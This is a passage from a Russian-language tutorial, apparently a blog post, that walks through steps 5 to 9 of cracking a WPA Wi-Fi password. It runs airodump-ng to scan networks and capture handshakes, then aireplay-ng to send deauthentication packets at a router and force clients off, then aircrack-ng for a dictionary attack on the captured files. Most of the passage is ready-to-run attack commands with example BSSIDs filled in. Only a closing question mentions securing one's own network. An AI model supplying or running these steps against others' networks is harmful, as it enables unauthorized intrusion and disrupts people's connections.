Теперь выполните такую команду: airodump-ng wlan0mon . Это позволит получить сведения о Wi-Fi-сетях, развёрнутых поблизости, о том, какие методы шифрования в них используются, а так же — о SSID.
Сведения о Wi-Fi-сетях
Шаг 6
Теперь воспользуемся такой командой:
airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]
В ней [channel] надо заменить на номер целевого канала, [bssid] — на целевой BSSID, [monitor interface] — на интерфейс мониторинга wlan0mon .
В результате моя команда будет выглядеть так:
airodump-ng -c 6 –bssid 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ wlan0mon
Выполнение команды
Шаг 7
Теперь нужно подождать. Утилита airodump будет мониторить сеть, ожидая момента, когда кто-нибудь к ней подключится. Это даст нам возможность получить handshake-файлы, которые будут сохранены в папке /root/Desktop .
Вот как выглядит работа утилиты до того момента, как кто-то подключился к исследуемой сети.
Программа наблюдает за сетью
А вот что происходит после того, как то-то к сети подключился, и программе удалось получить нужные данные.
Получение необходимых данных
Шаг 8
Вы можете пропустить этот шаг в том случае, если у вас уже есть handshake-файлы. Здесь описан альтернативный способ получения соответствующих данных.
Речь идёт об использовании следующей команды:
aireplay-ng -0 2 -a [router bssid] -c [client bssid] wlan0mon
Здесь [router bssid] нужно заменить на BSSID Wi-Fi-сети, а [client bssid] — на идентификатор рабочей станции.
Эта команда позволяет получить handshake-данные в том случае, если вам не хочется ждать момента чьего-либо подключения к сети. Фактически, эта команда атакует маршрутизатор, выполняя внедрение пакетов. Параметр -0 2 можно заменить другим числом, например, указать тут число 50, или большее число, и дождаться получения handshake-данных
Использование утилиты aireplay-bg
Шаг 9
Теперь воспользуемся такой командой:
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
- -a2 означает WPA.
- -b — это BSSID сети.
- -w — это путь к списку паролей.
- *.cap — это шаблон имён файлов, содержащих пароли.
aircrack-ng -a2 -b 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ww.txt /root/Desktop/*.cap
После выполнения этой команды начнётся процесс взлома пароля. Если пароль будет успешно взломан — вы увидите что-то, похожее на следующий скриншот.
Успешный взлом пароля
Как вы контролируете безопасность своих беспроводных сетей?